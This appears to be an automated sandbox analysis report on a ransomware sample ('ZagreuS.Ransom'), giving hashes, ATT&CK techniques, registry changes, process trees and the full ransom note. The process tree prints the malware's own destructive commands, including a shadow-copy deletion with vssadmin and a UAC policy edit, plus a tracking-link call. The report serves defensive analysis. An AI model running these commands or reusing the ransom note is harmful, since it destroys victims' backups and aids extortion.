ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858

Analysis

max time kernel
142s
max time network
140s
platform
windows7_x64
resource
win7-20220414-en
submitted
20-05-2022 09:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
Size

750KB
MD5

0f081afaae11c154edb8df747d612f93
SHA1

7b1478e64453d78ff60eda7b1d2cc3623d4a9210
SHA256

ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858
SHA512

4b76bd14bcdf5a5e0a73fe630dc430968d59a7c132b00cb9e12674ff6d6472a726b5ed7796fa1481eb7e7b2aacdbc356a3b028c2b3eb2cbd13af1650f3d20628

Score

10^/10

evasion link pdf ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note

Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $1000 worth of bitcoin to wallet: bc1qtc9dpp69th34m5dsuadhparzmt9qqr7sukuw93 after payment,we will send you Decryptor software contact email: uncrushman@protonmail.com Your personal ID: m4MhIJx65io3E7O40DGe0n1THcuMQxIIewKUKjawYlQbxYgRtn4nAMYEf/3E/IyFruptIcfMoXaA04HF50BTQUk5cx3iDQ0LwwhXkJ+jmM9BX96Gx75thNCKm66GKILIWnGp6QI4kYbSuJk2eUyGPChb23SWrV8Bb9A4rYwgepU=

Emails

uncrushman@protonmail.com

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 1 IoCs

Processes:

ZagreuS.Ransom.exe

pid process

520 ZagreuS.Ransom.exe

pid	process
520	ZagreuS.Ransom.exe

Loads dropped DLL 4 IoCs

Processes:

ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe

pid	process
1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Generic Ransomware Note 11 IoCs

Ransomware often writes a note containing information on how to pay the ransom.

Processes:

yara_rule
generic_ransomware_note
generic_ransomware_note
generic_ransomware_note
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe	generic_ransomware_note
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe	generic_ransomware_note
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe	generic_ransomware_note
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe	generic_ransomware_note
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe	generic_ransomware_note
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe	generic_ransomware_note
behavioral1/memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmp	generic_ransomware_note
C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt	generic_ransomware_note

HTTP links in PDF interactive object 1 IoCs

Detects HTTP links in interactive objects within PDF files.

pdf link

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf	pdf_with_link_action

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

664 vssadmin.exe
1512 vssadmin.exe

pid	process
664	vssadmin.exe
1512	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b000000000200000000001066000000010000200000004d1cc37b43295443d1124211e82edeea7121ae7d0be274e8ac341da1cfa8edac000000000e8000000002000020000000a9ac0e6f4eecbf126171806234d03ebfbc1fa8cf6948c83a707f83a0d433946920000000d81d384bf47ffc5fb0f9b86e26a9ca581dab22f7824a1585b783020ff4932b484000000080e0d54f5499807199339d3e53e6aca727043c940edb09f38f140a89c7f85e13d131403b7b14b03e49515084abacb84b803fafa5b00be613923517ce8880f453	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 502273e82c6cd801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0E2BF671-D820-11EC-BC64-62D05D50A506} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004863fcdc101a3947b120786fa95ba35b00000000020000000000106600000001000020000000b02db130897b7e4fab99534012ca0d0eebf8baa4ca738679036cf82a95a4983b000000000e8000000002000020000000e988dacaca7a0983d8fa6fed718cf6e2e490a7e7ffa19a1fb4d0051feb2e16fd90000000c5f56d3f14287cd2316d77ba01c018a0acdde1fc97dc145441e92d5f720848773afc51a833a01100a1dba3241d7db6146daefb886df4d25330ff44164f4e166369a64dd7d774943193267025a914b32ffc3c8a1e594276506ae84f0dab782955dd3e86888f5245e157d3e0ecdd560c0b04463f12adc5ed0bfce908780c8707a819c049b048b7545ca1b1baf05f722f2d400000005f0d11647b18ab0e5f54ab2e768c01871407ef9fa0920934879559edc0b1ac54ec2863576428454fd476b443dd5eca7736e419b9182560518f5c6ff7fce16138	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "359804248"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1636 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1968 NOTEPAD.EXE
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1764 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

vssvc.exe

description pid process

Token: SeBackupPrivilege 1340 vssvc.exe
Token: SeRestorePrivilege 1340 vssvc.exe
Token: SeAuditPrivilege 1340 vssvc.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1060 iexplore.exe

pid	process
1636	reg.exe

pid	process
1968	NOTEPAD.EXE

description	pid	process
Token: SeBackupPrivilege	1340	vssvc.exe
Token: SeRestorePrivilege	1340	vssvc.exe
Token: SeAuditPrivilege	1340	vssvc.exe

pid	process
1060	iexplore.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

AcroRd32.exeiexplore.exeIEXPLORE.EXE

pid	process
1764	AcroRd32.exe
1764	AcroRd32.exe
1764	AcroRd32.exe
1060	iexplore.exe
1060	iexplore.exe
1948	IEXPLORE.EXE
1948	IEXPLORE.EXE
1948	IEXPLORE.EXE
1948	IEXPLORE.EXE
1948	IEXPLORE.EXE
1948	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exeZagreuS.Ransom.execmd.execmd.execmd.exeiexplore.exe

description	pid	process	target process
PID 1808 wrote to memory of 520	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	ZagreuS.Ransom.exe
PID 1808 wrote to memory of 520	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	ZagreuS.Ransom.exe
PID 1808 wrote to memory of 520	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	ZagreuS.Ransom.exe
PID 1808 wrote to memory of 520	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	ZagreuS.Ransom.exe
PID 1808 wrote to memory of 1764	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	AcroRd32.exe
PID 1808 wrote to memory of 1764	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	AcroRd32.exe
PID 1808 wrote to memory of 1764	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	AcroRd32.exe
PID 1808 wrote to memory of 1764	1808	ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe	AcroRd32.exe
PID 520 wrote to memory of 1052	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1052	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1052	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1380	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1380	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1380	520	ZagreuS.Ransom.exe	cmd.exe
PID 1380 wrote to memory of 664	1380	cmd.exe	vssadmin.exe
PID 1380 wrote to memory of 664	1380	cmd.exe	vssadmin.exe
PID 1380 wrote to memory of 664	1380	cmd.exe	vssadmin.exe
PID 1052 wrote to memory of 1636	1052	cmd.exe	reg.exe
PID 1052 wrote to memory of 1636	1052	cmd.exe	reg.exe
PID 1052 wrote to memory of 1636	1052	cmd.exe	reg.exe
PID 520 wrote to memory of 1612	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1612	520	ZagreuS.Ransom.exe	cmd.exe
PID 520 wrote to memory of 1612	520	ZagreuS.Ransom.exe	cmd.exe
PID 1612 wrote to memory of 1512	1612	cmd.exe	vssadmin.exe
PID 1612 wrote to memory of 1512	1612	cmd.exe	vssadmin.exe
PID 1612 wrote to memory of 1512	1612	cmd.exe	vssadmin.exe
PID 520 wrote to memory of 1060	520	ZagreuS.Ransom.exe	iexplore.exe
PID 520 wrote to memory of 1060	520	ZagreuS.Ransom.exe	iexplore.exe
PID 520 wrote to memory of 1060	520	ZagreuS.Ransom.exe	iexplore.exe
PID 1060 wrote to memory of 1948	1060	iexplore.exe	IEXPLORE.EXE
PID 1060 wrote to memory of 1948	1060	iexplore.exe	IEXPLORE.EXE
PID 1060 wrote to memory of 1948	1060	iexplore.exe	IEXPLORE.EXE
PID 1060 wrote to memory of 1948	1060	iexplore.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe
"C:\Users\Admin\AppData\Local\Temp\ab6de66f1fbf393be0d71a7559be0e3e7a6c9d8fc4b4161171c027185ff17858.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1808

C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
"C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
3⤵
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
4⤵
- Modifies registry key
PID:1636

C:\Windows\system32\cmd.exe
"cmd.exe" /c vssadmin.exe delete shadows /all /quiet
3⤵
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:664

C:\Windows\system32\cmd.exe
"cmd.exe" /c vssadmin.exe delete shadows /all /quiet
3⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:1512

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2Y1Gy5
3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1060

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1948

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf"
2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1764

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1968

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

File Deletion

T1107

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\31994-109-71389-1-10-20171224.pdf
Filesize
519KB

MD5
f628a245651b09f63d2f888761d99543

SHA1
f004b9a7b6be37ba12d05167073cc2804b08ab64

SHA256
de51caa63ba814dc3aa4024a7ad2bf7b8e4ccdf7caf0f355857ab02a3d796bb6

SHA512
842b4cb2763df75215301213b705748cfd3377ce0dd467d7c9b6a8b7e3386964c1fb3fdef141b90c1012e76ebbef37e9759469b089c8d85db7cf9ca96ef2301d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize
27KB

MD5
961d5eab06ae737f0425824c5cdb92d9

SHA1
56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

SHA256
4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

SHA512
56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize
27KB

MD5
961d5eab06ae737f0425824c5cdb92d9

SHA1
56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

SHA256
4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

SHA512
56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6I9G92W5.txt
Filesize
605B

MD5
9fe3383fe866ac30958cfb27a720bad5

SHA1
045a942300977b237aca9a902a87f4ad0cb34b6d

SHA256
4ee227a761fb706173f6caca871b2d0b68bf87cb4e3f7ca0916d97a7393dfa5a

SHA512
17a13616c617f0c1b22456346923f2ce856e7e1d2e6b0a8ce09fe663a901db1d8ffb85c6c5e9ad7f96e88bd5fc14c9742f097000b1c4f948db82d79f861514ab

Download Submit
C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt
Filesize
1KB

MD5
ea4ae25750a7af617159abde94d61e59

SHA1
f31c8f9ea2d2468fcb2a164712edbc9e0b2d4ba2

SHA256
73e50c956d403d060a6c0a193caa17bb641c06785b06285729929efcbdba3c02

SHA512
7c5f949ccd35ac77131ab528d3d2d95e6ae8899ba0e665036370eb9a5cf5557fefdd865e5c59a52795891903f968512a83efbe37edecb03c57c8573c757cf03a

Download Submit
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize
27KB

MD5
961d5eab06ae737f0425824c5cdb92d9

SHA1
56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

SHA256
4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

SHA512
56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

Download Submit
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize
27KB

MD5
961d5eab06ae737f0425824c5cdb92d9

SHA1
56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

SHA256
4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

SHA512
56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

Download Submit
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize
27KB

MD5
961d5eab06ae737f0425824c5cdb92d9

SHA1
56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

SHA256
4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

SHA512
56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

Download Submit
\Users\Admin\AppData\Local\Temp\ZagreuS.Ransom.exe
Filesize
27KB

MD5
961d5eab06ae737f0425824c5cdb92d9

SHA1
56c76e63db1d7ba3eb44cf4f5e04b0976f56933a

SHA256
4f5f5ef38a63d201c4011606f03960a87534b9516ee9417b8cb39dff69d5e196

SHA512
56c66790e9adff70b1da48b74f17f6cde02940189248cb99538b0457eff31ddad8ce1e48e292473863c812afaa6295e39b32682abb2a4ca6d8933541a4da28fd

Download Submit
memory/520-59-0x0000000000000000-mapping.dmp

Download
memory/520-65-0x000007FEFB671000-0x000007FEFB673000-memory.dmp

Filesize
8KB

Download
memory/520-64-0x0000000000FA0000-0x0000000000FAC000-memory.dmp

Filesize
48KB

Download
memory/664-68-0x0000000000000000-mapping.dmp

Download
memory/1052-66-0x0000000000000000-mapping.dmp

Download
memory/1380-67-0x0000000000000000-mapping.dmp

Download
memory/1512-72-0x0000000000000000-mapping.dmp

Download
memory/1612-71-0x0000000000000000-mapping.dmp

Download
memory/1636-69-0x0000000000000000-mapping.dmp

Download
memory/1764-62-0x0000000000000000-mapping.dmp

Download
memory/1808-54-0x0000000075BD1000-0x0000000075BD3000-memory.dmp

Filesize
8KB

Download